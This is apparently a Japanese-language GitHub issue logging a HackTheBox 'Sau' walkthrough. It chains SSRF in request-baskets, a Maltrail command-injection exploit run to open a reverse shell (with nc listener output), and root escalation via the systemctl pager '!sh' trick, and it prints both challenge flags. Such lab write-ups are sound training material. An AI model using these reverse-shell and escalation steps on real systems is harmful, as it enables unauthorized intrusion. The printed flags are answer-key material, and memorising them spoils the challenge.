search

roaris / ctf-log

0 stars 0 forks source link

HackTheBox: Sau (Machine Easy) #37

Open roaris opened 4 months ago

roaris commented 4 months ago

https://app.hackthebox.com/machines/Sau

$ nmap -sC -sV -Pn 10.10.11.224
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-06 14:54 JST
Nmap scan report for 10.10.11.224
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Mon, 06 May 2024 05:50:01 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Mon, 06 May 2024 05:49:32 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Mon, 06 May 2024 05:49:32 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94SVN%I=7%D=5/6%Time=6638708D%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html
SF:;\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Mon,\x2006\x20May\x
SF:202024\x2005:49:32\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"
SF:/web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:
SF:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x2
SF:0200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Mon,\x2006\x20May\x
SF:202024\x2005:49:32\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReque
SF:st,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x2040
SF:0\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\
SF:nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67
SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x2
SF:0charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r
SF:(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Optio
SF:ns:\x20nosniff\r\nDate:\x20Mon,\x2006\x20May\x202024\x2005:50:01\x20GMT
SF:\r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20n
SF:ame\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\
SF:$\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Typ
SF:e:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x
SF:20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Reque
SF:st\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20c
SF:lose\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.53 seconds
roaris commented 4 months ago

80番ポートは繋がらない 55555番ポートでWebアプリケーションが立ち上がった

個別のURLを持ったBasketというのを作って、URL宛てのリクエストを確認出来るというアプリケーション 3ze9avcという名前のBasketなら、http:\//10.10.11.224:55555/3ze9avc宛てのリクエストを確認出来る

Burpで通信を見てみる

roaris commented 4 months ago

Basketを作成すると(POST /api/baskets/<basket名>)、トークンが返ってきて、Local storageに保存される このトークンはBasket内のリクエストの確認や、Basketの削除時にAuthorizationヘッダで送信される トークンが間違っていると401が返される とりあえずSQLインジェクション試したが通らない

Master Tokenというのが分かると、全てのBasketを閲覧出来る

roaris commented 4 months ago

今回独自のWebアプリケーションかと思っていたら、ページの下の方にPowered by request-baskets | Version: 1.2.1とあった

https://github.com/darklynx/request-baskets テスト用のWebhook URLを提供するなどといった目的のサービスらしい

exploit-dbでrequest-basketsを検索したが出てこない Releasesを見たが、大きめの脆弱性はなさそう(Minor bug and security fixesとはあるけど、詳細が不明)

request-baskets 1.2.1 cveでGoogle検索したら出てきた SSRFの脆弱性 https://github.com/entr0pie/CVE-2023-27163 exploit-dbに載ってないとかあるのか...

roaris commented 4 months ago

BasketのForward URLに内部ネットワークのURLを指定すると、SSRFが出来るという脆弱性みたいだけど、この脆弱性を突いて出来そうなことがないな 閲覧権限のないBasketの情報を取得することは出来ない(内部からBasketへのリクエストでも、Authorizationヘッダがないので、401が返るだけ)

roaris commented 4 months ago

そういえば、ポート80の存在を思い出した

このようにForward URLを設定して、 image

Basketにリクエストを送信すれば、ポート80からのレスポンスを確認出来る

$ curl http://10.10.11.224:55555/h7krcrt
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta http-equiv="Content-Type" content="text/html;charset=utf8">
        <meta name="viewport" content="width=device-width, user-scalable=no">
        <meta name="robots" content="noindex, nofollow">
        <title>Maltrail</title>
        <link rel="stylesheet" type="text/css" href="css/thirdparty.min.css">
        <link rel="stylesheet" type="text/css" href="css/main.css">
        <link rel="stylesheet" type="text/css" href="css/media.css">
        <script type="text/javascript" src="js/errorhandler.js"></script>
        <script type="text/javascript" src="js/thirdparty.min.js"></script>
        <script type="text/javascript" src="js/papaparse.min.js"></script>
    </head>
    <body>
        <div id="header_container" class="header noselect">
            <div id="logo_container">
                <span id="logo"><img src="images/mlogo.png" style="width: 25px">altrail</span>
            </div>
            <div id="calendar_container">
                <center><span id="spanToggleHeatmap" style="cursor: pointer"><a class="header-a header-period" id="period_label"></a><img src="images/calendar.png" style="width: 25px; height: 25px; vertical-align: top"></span></center>
            </div>
            <ul id="link_container">
                <li class="header-li"><a class="header-a" href="https://github.com/stamparm/maltrail/blob/master/README.md" id="documentation_link" target="_blank">Documentation</a></li>
                <li class="header-li link-splitter">|</li>
                <li class="header-li"><a class="header-a" href="https://github.com/stamparm/maltrail/wiki" id="wiki_link" target="_blank">Wiki</a></li>
                <li class="header-li link-splitter">|</li>
<!--                <li class="header-li"><a class="header-a" href="https://docs.google.com/spreadsheets/d/1lJfIa1jPZ-Vue5QkQACLaAijBNjgRYluPCghCVBMtHI/edit" id="collaboration_link" target="_blank">Collaboration</a></li>
                <li class="header-li link-splitter">|</li>-->
                <li class="header-li"><a class="header-a" href="https://github.com/stamparm/maltrail/issues/" id="issues_link" target="_blank">Issues</a></li>
                <li class="header-li link-splitter hidden" id="login_splitter">|</li>
                <li class="header-li"><a class="header-a hidden" id="login_link">Log In</a></li>
                <li class="header-li"></li>
            </ul>
        </div>

        <div id="heatmap_container" class="container hidden" style="text-align: center">
            <div>
                <button id="heatmap-previous" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only" type="button" role="button">
                    <span class="ui-icon ui-icon-carat-1-w"></span>
                </button>
                <button id="heatmap-next" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only" type="button" role="button">
                    <span class="ui-icon ui-icon-carat-1-e"></span>
                </button>
            </div>

            <div style="display: inline-block; float: top; vertical-align: top; margin-top: 5px">
                <div id="cal-heatmap" style="display: inline-block"></div>
            </div>
        </div>

        <div id="main_container" class="container hidden">
            <div id="status_container" style="width: 100%; text-align: center">
                <div>
                    <ul style="list-style: outside none none; overflow: hidden; font-family: sans-serif; padding: 0px; display: inline-block; white-space: nowrap">
                        <li id="btnDrawThreats" class="status-button noselect" style="background: rgb(31, 119, 180); background: radial-gradient(rgb(174, 199, 232) 0%, rgb(31, 119, 180) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Threats">
                            <h4 id="threats_count">-</h4>
                            <span class="dynamicsparkline" id="threats_sparkline"></span>
                            <h6>Threats</h6>
                        </li>
                        <li id="btnDrawEvents" class="status-button noselect" style="background: rgb(255, 127, 14); background: radial-gradient(rgb(255, 187, 120) 0%, rgb(255, 127, 14) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Events">
                            <h4 id="events_count">-</h4>
                            <span class="dynamicsparkline" id="events_sparkline"></span>
                            <h6>Events</h6>
                        </li>
                        <li id="btnDrawSeverity" class="status-button noselect" style="background: rgb(44, 160, 44); background: radial-gradient(rgb(152, 223, 138) 0%, rgb(44, 160, 44) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Severity">
                            <h4 id="severity_count">-</h4>
                            <span class="dynamicsparkline" id="severity_sparkline"></span>
                            <h6>Severity</h6>
                        </li>
                        <li id="btnDrawSources" class="status-button noselect" style="background:rgb(214, 39, 40); background: radial-gradient(rgb(255, 152, 150) 0%, rgb(214, 39, 40) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Sources">
                            <h4 id="sources_count">-</h4>
                            <span class="dynamicsparkline" id="sources_sparkline"></span>
                            <h6>Sources</h6>
                        </li>
                        <li id="btnDrawTrails" class="status-button noselect" style="background:rgb(148, 103, 189); background: radial-gradient(rgb(197, 176, 213) 0%, rgb(148, 103, 189) 100%) repeat scroll 0 0 rgba(0, 0, 0, 0)" title="Trails">
                            <h4 id="trails_count">-</h4>
                            <span class="dynamicsparkline" id="trails_sparkline"></span>
                            <h6>Trails</h6>
                        </li>
                    </ul>
                </div>
                <div>
                    <!--<label>title</label>-->
                    <img id="graph_close" src="images/close.png" class="hidden" title="close">
                </div>
                <div id="chart_area">
                </div>
            </div>

            <table width="100%" border="1" cellpadding="2" cellspacing="0" class="display compact" id="details">
            </table>
        </div>

        <noscript>
            <div id="noscript">
                Javascript is disabled in your browser. You must have Javascript enabled to utilize the functionality of this page.
            </div>
        </noscript>

        <div id="bottom_blank"></div>
        <div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>

        <ul class="custom-menu">
            <li data-action="hide_threat">Hide threat</li>
            <li data-action="report_false_positive">Report false positive</li>
        </ul>
        <script defer type="text/javascript" src="js/main.js"></script>
    </body>
</html>

Proxy Responseにチェックを入れることで、Forward URLからのレスポンスを確認出来る Expand Forward Pathにチェックを入れることで、例えば、http:\//10.10.11.224:55555/h7krcrt/js/main.jsへのリクエストがhttp:\//127.0.0.1/js/main.jsにforwardされる

roaris commented 4 months ago

aタグの中のリンクを確認した https://github.com/stamparm/maltrail : Maltrailという悪意のあるトラフィックを検知するためのシステムがあるらしい HTMLの下の方にPowered by <b>M</b>altrail (v<b>0.53</b>)とあるので、Maltrail v0.53が使われていると分かる https://docs.google.com/spreadsheets/d/1lJfIa1jPZ-Vue5QkQACLaAijBNjgRYluPCghCVBMtHI/edit : 謎のスプレッドシート(勝手に編集出来るし、重要情報はないはず)

exploit-dbでMaltrailを調べたけど出てこなかった けど、Maltrail 0.53でGoogle検索したら出てきた https://github.com/spookier/Maltrail-v0.53-Exploit WAFなどの検知を回避するためにペイロードをbase64エンコードしているらしい

roaris commented 4 months ago

$ python exploit.py 10.10.14.20 8000 http://10.10.11.224:55555/h7krcrtでリバースシェルを取れた

$ nc -lvp 8000
listening on [any] 8000 ...
10.10.11.224: inverse host lookup failed: Unknown host
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.224] 48204
$ bash -i
bash -i
puma@sau:/opt/maltrail$ whoami
whoami
puma
roaris commented 4 months ago

user.txtをゲット

puma@sau:/opt/maltrail$ cd /home
cd /home
puma@sau:/home$ ls
ls
puma
puma@sau:/home$ cd puma
cd puma
puma@sau:~$ ls
ls
user.txt
puma@sau:~$ cat user.txt
cat user.txt
9d56e21024c2d793518953262ae8fca9
roaris commented 4 months ago

sudo -lすると、/usr/bin/systemctl status trail.serviceがroot権限で実行可能なことが分かったけど、trail.serviceのステータスが確認出来るだけなので、権限昇格には繋がらないはず

puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$ /usr/bin/systemctl status trail.service
/usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2024-05-06 05:40:02 UTC; 4h 23min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 916 (python3)
      Tasks: 22 (limit: 4662)
     Memory: 37.7M
     CGroup: /system.slice/trail.service
             ├─ 916 /usr/bin/python3 server.py
             ├─1453 /bin/sh -c logger -p auth.info -t "maltrail[916]" "Failed p…
             ├─1454 /bin/sh -c logger -p auth.info -t "maltrail[916]" "Failed p…
             ├─1463 sh
             ├─1464 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I…
             ├─1465 /bin/sh
             ├─1469 script /dev/null -c bash
             ├─1470 bash
             ├─1513 sudo /usr/bin/systemctl status trail.service
             ├─1514 /usr/bin/systemctl status trail.service
             ├─1515 pager
             ├─1516 sh -c /bin/bash -c /bin/bash
             ├─1517 /bin/bash
             ├─1569 /bin/sh -c logger -p auth.info -t "maltrail[916]" "Failed p…
             ├─1570 /bin/sh -c logger -p auth.info -t "maltrail[916]" "Failed p…
             ├─1573 sh
             ├─1574 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I…
             ├─1575 /bin/sh
             ├─1576 bash -i
             └─1590 /usr/bin/systemctl status trail.service

May 06 09:18:43 sau su[1485]: pam_unix(su:auth): authentication failure; l…=root
May 06 09:18:45 sau su[1485]: FAILED SU (to root) puma on pts/1
May 06 09:19:09 sau su[1486]: pam_unix(su:auth): authentication failure; l…=root
May 06 09:19:11 sau su[1486]: FAILED SU (to root) puma on pts/1
May 06 09:22:04 sau sudo[1506]: pam_unix(sudo:auth): authentication failur…=puma
Warning: journal has been rotated since unit was started and some journal files were not opened due to insufficient permissions, output may be incomplete.
Hint: Some lines were ellipsized, use -l to show in full.
roaris commented 4 months ago

/home/puma/.gnupgが怪しいかも GnuPGは暗号化のためのソフトウェアらしい private-keys-v1.dの中は空

puma@sau:~$ ls -al
ls -al
total 32
drwxr-xr-x 4 puma puma 4096 Jun 19  2023 .
drwxr-xr-x 3 root root 4096 Apr 15  2023 ..
lrwxrwxrwx 1 root root    9 Apr 14  2023 .bash_history -> /dev/null
-rw-r--r-- 1 puma puma  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 puma puma 3771 Feb 25  2020 .bashrc
drwx------ 2 puma puma 4096 Apr 15  2023 .cache
drwx------ 3 puma puma 4096 Apr 15  2023 .gnupg
-rw-r--r-- 1 puma puma  807 Feb 25  2020 .profile
lrwxrwxrwx 1 puma puma    9 Apr 15  2023 .viminfo -> /dev/null
lrwxrwxrwx 1 puma puma    9 Apr 15  2023 .wget-hsts -> /dev/null
-rw-r----- 1 root puma   33 May  6 05:40 user.txt
puma@sau:~$ ls -al .gnupg
ls -al .gnupg
total 20
drwx------ 3 puma puma 4096 Apr 15  2023 .
drwxr-xr-x 4 puma puma 4096 Jun 19  2023 ..
drwx------ 2 puma puma 4096 Apr 15  2023 private-keys-v1.d
-rw------- 1 puma puma   32 Apr 15  2023 pubring.kbx
-rw------- 1 puma puma 1200 Apr 15  2023 trustdb.gpg
puma@sau:~$ ls -al .gnupg/private-keys-v1.d
ls -al .gnupg/private-keys-v1.d
total 8
drwx------ 2 puma puma 4096 Apr 15  2023 .
drwx------ 3 puma puma 4096 Apr 15  2023 ..
roaris commented 4 months ago

詰んだのでGuided Mode

Task9 : What is the full path to the application the user puma can run as root on Sau? Hint : Run the sudo -l command to see what applications the user can run as root. A : /usr/bin/systemctl

Task10 : What is the full version string for the instance of systemd installed on Sau? Hint : Refer to the man page for systemctl on how to find the systemd version installed on the system.

そこに着目するのか... /usr/bin/systemctl status trail.service を実行して権限昇格に繋がるとは思えないが... https://www.nixcraft.com/t/how-to-find-systemd-version-on-linux/3848 によると、systemctl --versionでsystemdのバージョンを確認出来る

puma@sau:~$ /usr/bin/systemctl --version
/usr/bin/systemctl --version
systemd 245 (245.4-4ubuntu3.22)
+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN2 -IDN +PCRE2 default-hierarchy=hybrid

A : systemd 245 (245.4-4ubuntu3.22)

systemd 245 priviledge escalation でGoogle検索すると、https://bugzilla.redhat.com/show_bug.cgi?id=2175611 を見つけた https://security.sios.jp/vulnerability/systemd-security-vulnerability-20230307/ こっちの方が分かりやすい ターミナルのサイズが小さいと、systemctl statusの結果がlessに渡されて、その時に!shを打ち込むとシェルが起動出来るというもの そんな脆弱性があるとは

Task11 : What is the CVE ID for a local privilege escalation vulnerability that affects that particular systemd version? Hint : Search for terms like "Systemd Vulnerabilities" A : CVE-2023-26604

roaris commented 4 months ago

root.txtをゲット

puma@sau:~$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# bash -i
bash -i
root@sau:/home/puma# whoami
whoami
root
root@sau:/home/puma# cd /root
cd /root
root@sau:~# ls
ls
go  root.txt
root@sau:~# cat root.txt
cat root.txt
cd0cd0fde253162d06453e02718cf510
roaris commented 4 months ago

解き方まとめ

  1. request-baskets v1.2.1が使われていることに気づく
  2. request-baskets v1.2.1にSSRFの脆弱性があるのを見つける
  3. SSRFの脆弱性を使って、ポート80番のHTMLを取得する
  4. ポート80でMaltrail v0.53が使われていることに気づく
  5. Mailtrail v0.53にコマンドインジェクションの脆弱性があるのを見つける
  6. リバースシェルをして、pumaユーザの権限を得て、user.txtをゲット
  7. sudo -lで/usr/bin/systemctl status trail.serviceがroot権限で実行出来ることに気づく
  8. systemctl --versionでsystemdのバージョンを調べ、このバージョンにローカル権限昇格の脆弱性があるのを見つける
  9. sudo /usr/bin/systemctl status trail.serviceを実行して、rootユーザの権限を得て、root.txtをゲット